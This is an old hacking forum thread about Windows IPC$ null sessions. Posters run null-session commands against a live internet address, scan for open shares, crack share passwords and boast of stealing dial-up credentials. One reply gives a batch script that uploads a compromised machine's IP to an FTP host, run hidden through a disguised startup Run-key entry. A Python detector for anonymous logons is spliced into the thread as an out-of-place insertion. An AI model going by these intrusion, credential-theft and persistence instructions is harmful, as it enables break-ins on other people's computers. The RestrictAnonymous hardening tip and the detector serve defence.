Is it possible to hack, brute force or retrieve a WIN NT IPC$ password remotely via WIN 98?
thanks guys..
KuunLB
Aug 14 2003, 01:05 AM
I noticed something a while back..
When I tried to access my computer (Windows 2000 SP3) from a WinME machine, I couldn't get past the IPC$ even with my own passwords.
The only way I could get past was by enabling a guest account on my machine (who would have ever thought?)
I'd be interested in seeing how secure IPC$ is.
Kuun
shadowdancer123
Aug 14 2003, 05:23 AM
Hi, Inter-Process Communication (IPC) is a way of exchanging info between client and server in a Windows environment. But using the ipc$ share (a default hidden share in Windows) a remote user can establish a null session. (A null session is where a computer or user can connect to a remote machine without providing a user ID or password.)
To connect using a null session use the following command:
CODE
c:\>net use \\computer\ipc$ "" /user:""
But using an ipc$ you cannot hack into a machine,
you can just enumerate the following:
· The list of user accounts on that server
· RAS callback numbers
· Status of the account lockout for all users
· Last logged on date and time for user accounts
· Remote access to the Registry
· Status of all NTFS file permissions on the system
· Account policy on machine
· User rights on the machine
· List of services on the machine and their status
You can disable the default ipc$ share by setting the following registry key value to 2:
HKLM\system\currentcontrolset\control\lsa\restrictanonymous
Regards
Shadow
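The server-side trace of the null session described above is a successful network logon by the anonymous account, so a defender can spot enumeration attempts in the Security log. The following is an added example, not code from the thread; it parses constructed sample log lines (the field layout is an assumption) and counts anonymous network logons per source address.

```python
from collections import Counter

# Constructed sample lines (not from the thread): Windows Security log 4624
# "An account was successfully logged on" events flattened to key=value pairs
# separated by ';'. On Windows 2000/XP the equivalent event is 540.
SAMPLE_EVENTS = [
    "EventID=4624;LogonType=3;AccountName=ANONYMOUS LOGON;AccountDomain=NT AUTHORITY;SourceAddress=10.0.0.5;AuthPackage=NTLM",
    "EventID=4624;LogonType=3;AccountName=jsmith;AccountDomain=CORP;SourceAddress=10.0.0.7;AuthPackage=Kerberos",
    "EventID=4624;LogonType=3;AccountName=ANONYMOUS LOGON;AccountDomain=NT AUTHORITY;SourceAddress=10.0.0.5;AuthPackage=NTLM",
    "EventID=4624;LogonType=3;AccountName=ANONYMOUS LOGON;AccountDomain=NT AUTHORITY;SourceAddress=10.0.0.5;AuthPackage=NTLM",
    "EventID=4624;LogonType=2;AccountName=admin;AccountDomain=CORP;SourceAddress=127.0.0.1;AuthPackage=Negotiate",
    "EventID=4625;LogonType=3;AccountName=ANONYMOUS LOGON;AccountDomain=NT AUTHORITY;SourceAddress=10.0.0.9;AuthPackage=NTLM",
    "EventID=4624;LogonType=3;AccountName=ANONYMOUS LOGON;AccountDomain=NT AUTHORITY;SourceAddress=10.0.0.9;AuthPackage=NTLM",
]


def parse_event(line):
    """Turn one flattened event line into a dict of field -> value."""
    fields = {}
    for pair in line.split(";"):
        key, _, value = pair.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_null_session_logon(ev):
    """A successful network logon (type 3) by ANONYMOUS LOGON is what
    'net use \\\\host\\ipc$ "" /user:""' leaves in the server's log."""
    return (ev.get("EventID") == "4624"
            and ev.get("LogonType") == "3"
            and ev.get("AccountName", "").upper() == "ANONYMOUS LOGON")


def null_sessions_by_source(lines, threshold=2):
    """Count anonymous network logons per source address and return the
    sources at or above the threshold. A single anonymous IPC$ connect can be
    benign LAN browser/print traffic; several from one address are worth a
    look, and RestrictAnonymous limits what such a session can list."""
    counts = Counter()
    for line in lines:
        ev = parse_event(line)
        if is_null_session_logon(ev):
            counts[ev.get("SourceAddress", "?")] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for src, n in sorted(null_sessions_by_source(SAMPLE_EVENTS).items()):
        print(f"{src}: {n} anonymous network logons")
```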
ReMiXx
Aug 16 2003, 09:22 AM
You should try a program called 'X-Scan'. It searches machines for weak vulnerabilities. You can get it at http://www.xFocus.org. It's useful for "hacking" or finding weak vulns in your computer so you can patch them up.
-Layta
andariel
Sep 8 2003, 02:52 PM
Nice info shadow, I used it and I got a successful prompt. Here is my prompt:
CODE
D:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
The command completed successfully.

D:\>net use
New connections will be remembered.

Status       Local     Remote                      Network
-------------------------------------------------------------------------------
OK                     \\195.146.48.251\ipc$       Microsoft Windows Network
The command completed successfully.

D:\>
Now what? What can I do?
PS: I don't know much about the net command, I just know about the send and use commands. Is there a good and complete tutorial or document about it on the net?
Thanks, andariel
thatsmej
Sep 8 2003, 03:12 PM
QUOTE
Now what? What can I do?
QUOTE
you can just enumerate the following:
· The list of user accounts on that server
· RAS callback numbers
· Status of the account lockout for all users
· Last logged on date and time for user accounts
· Remote access to the Registry
· Status of all NTFS file permissions on the system
· Account policy on machine
· User rights on the machine
· List of services on the machine and their status
Not much.
And there are docs on the net, just search using Google..
jak3c
Sep 9 2003, 07:23 PM
At this time the remote Windows share is mounted on your system. You can easily copy files onto the remote computer... and execute them with NTcmd.exe, but you must have a login and password.
Use X-Scan!
netcomm
Sep 10 2003, 04:51 AM
Google for ipcscan.exe.
It's awesome, I have gained many a dial-up username and password with
ipcscan.exe and DameWare.
Peace NetComm
tyler.durden
Feb 12 2004, 10:06 AM
QUOTE (jak3c @ Sep 9 2003, 07:23 PM)
At this time the remote Windows share is mounted on your system. You can easily copy files onto the remote computer... and execute them with NTcmd.exe, but you must have a login and password.
Use X-Scan!
I'm trying in my LAN.
I have an admin account on local machine 192.168.100.25, and this is the classic Administrator/NULL.
So I can mount with net use all the shares I want... but I can't use ntcmd.exe... how does it work? Should it be the same as psexec.exe?
Another question guys... I tried this method on the internet also, making a little scan of boxes running 135/139 with a simple account... if I try -net use x \\ip\sharedir "pass" /user:"user" - it does not work... mmmmh... I don't know what is wrong...
gephorce
Feb 12 2004, 04:34 PM
After you find someone with ports 135/139 open, you're supposed to use the Nbtstat -A xxx.xxx.xxx.xxx command. That will tell if the person can share and what not. Whenever I use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the Net View \\xxx.xxx.xxx.xxx command. That will show you the shares they have. If nothing shows up, then try a guess at using their Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well. If the person ends up using a password for their shares (C$, Admin$, ...), then you can use programs like NAT to try cracking the passwords. I have yet to have it work but I've heard it works within minutes of trying to guess. But there's also more programs for that too.
I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrictanonymous, to 2 and it didn't get rid of the ipc$ share.
tyler.durden
Feb 12 2004, 05:02 PM
QUOTE (gephorce @ Feb 12 2004, 04:34 PM)
After you find someone with ports 135/139 open, you're supposed to use the Nbtstat -A xxx.xxx.xxx.xxx command. That will tell if the person can share and what not. Whenever I use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the Net View \\xxx.xxx.xxx.xxx command. That will show you the shares they have. If nothing shows up, then try a guess at using their Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well. If the person ends up using a password for their shares (C$, Admin$, ...), then you can use programs like NAT to try cracking the passwords. I have yet to have it work but I've heard it works within minutes of trying to guess. But there's also more programs for that too.
I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrictanonymous, to 2 and it didn't get rid of the ipc$ share.
Nice explanation, thank you... and the regkey for protecting yourself is really useful. For me too the "nbtstat -a [or -A] IP" doesn't work... so I'm not alone, nice to see that lol
In some 139/135 scans I've found IPs with \IPC$ null session working... in their shares I found the "SharedDocs" dir, the public share provided by WinXP; if I map it with net use I can read/write inside... this looks cool to me, and I hope I may execute also some proggy... is it possible?
ST.
Feb 12 2004, 05:21 PM
There was an exploit for non-patched Windows 98 a few years ago. Try to find it, it works well.
gephorce
Feb 12 2004, 11:18 PM
You can use Computer Management to connect to their computer and enable services, etc... You can also use registry edit to do so. Using both, just go to File at the top and you'll see remote connection options. (Not named that, but similar.)
If you enable Telnet, you can execute programs that way.
tyler.durden
Feb 13 2004, 09:12 AM
QUOTE (gephorce @ Feb 12 2004, 11:18 PM)
You can use Computer Management to connect to their computer and enable services, etc... You can also use registry edit to do so. Using both, just go to File at the top and you'll see remote connection options. (Not named that, but similar.)
If you enable Telnet, you can execute programs that way.
Who are you replying to?
For doing this I think you must have an admin account...
PL3X59
Feb 13 2004, 09:42 AM
Try to use the ntscan module when there is an ipc$ account ... I think this is ntcmd.
Or you can use DameWare NT Utilities, this is a very nice tool.
So, if you can find an ipc$ account, and if you can't use it, maybe you have a firewall?
Or try to see in regedit if restrictanonymous = 0.
plex
PL3X59
Feb 13 2004, 12:20 PM
Argg
I can't make a new post so
does anyone know a program which can tell me the IP address of the machine where it was installed ...
I can use a dyndns for example ... is there any invisible one?
Thx
plex
oYost
Feb 13 2004, 12:41 PM
The best solution is to put an IRC bot on your stro, so you can take the new IP when it connects, but you can also write a batch which sends the new IP to an FTP:
CODE
waitfor 300 (to wait for the connection)
ipconfig >> c:\IP.txt
echo open IPOFTHEFTP PORTOFTHEFTP >> c:\temp.ini
echo user >> c:\temp.ini
echo pass >> c:\temp.ini
echo put c:\1.txt >> c:\temp.ini
echo quit >> c:\temp.ini
ftp -s:c:\temp.ini
exit
And you have to run this batch silently at startup with hiderun or hidden32.
Sorry for my English
[EDIT] You have to download waitfor.exe and put it in the %windir% directory
PL3X59
Feb 13 2004, 12:58 PM
oYost, you understand my question and this is a good reply, but I know these 2 methods ...
in fact
first, with an ipconfig /all maybe you don't have the correct IP ... if there is for example a routeur (in French lol) (you know?? routeur?? cisco?? lol) I have my batch file you know and hidden32 :-p
To put the program on the boot, 2 keys for regedit:
CODE
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\run.bat /yes">>root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\hide.bat /yes">>root.reg
... in fact I'm looking for any cmd to put the very IP published on the Internet in the .txt
but there are some programs like Direct Update for dyndns.org ... for example...
maybe there is one that is very simple and invisible :-D
plex
I like this forum :-D
Thx oYost
but why can't I make new posts?
oYost
Feb 13 2004, 01:31 PM
Hehe, so we can speak French from France then, no, we'll get kicked, but just for this post: "in fact i m looking for any cmd to put the very @ip published on Internet in the .txt" You'll have to explain that to me in French.
Sorry all for this little speech in French, to translate: http://tr.voila.fr/
PL3X59
Feb 13 2004, 01:39 PM
ok dude
I'm looking for a command which tells me the IP published on the internet
when you have a routeur like a cisco ... with an ipconfig /all
you'll have
CODE
lan ip 192.168.0.1 for example
MSR 255.255.255.0 for example
gateway ... 192.168.0.254
I haven't compiled it but you can try and maybe modify it to create a text file which contains the IP, good luck
gephorce
Feb 13 2004, 05:38 PM
Why don't you just go to Www.Whatismyip.com?
I can't make new posts either, it sucks.
PL3X59
Feb 14 2004, 09:55 PM
But ... in a batch file ... you can't take this IP and put it in a txt file ..
I'll try Visual Basic :-p
wetwilly
Feb 19 2004, 12:08 AM
How come I cannot connect with the standard administrator/null on an XP Home box?
piranicon
Feb 19 2004, 06:49 AM
Hmm, I wrote a VB app that pulls the info from my router, parses it and spits out the WAN IP, but you'd have to configure the code to work on a different router. That's the only way I found to get the WAN IP without connecting to a remote site.
caleb
Feb 19 2004, 04:38 PM
QUOTE
How come I cannot connect with the standard administrator/null on an XP Home box?
XP Home only allows guest logins... This is part of simple file sharing, which can't be disabled in XP Home, as far as I know. This means there really is no way to log on remotely to an XP Home machine except as a guest.
o0oKARo0o
Feb 20 2004, 01:39 AM
To scan IPC, fxscanner is very nice, you can install remotely and then use DameWare to access the machine..
wetwilly
Feb 22 2004, 02:07 PM
QUOTE (caleb @ Feb 19 2004, 04:38 PM)
QUOTE
How come I cannot connect with the standard administrator/null on an XP Home box?
XP Home only allows guest logins... This is part of simple file sharing, which can't be disabled in XP Home, as far as I know. This means there really is no way to log on remotely to an XP Home machine except as a guest.
OK, thanks a lot for that info!
It has been nagging me!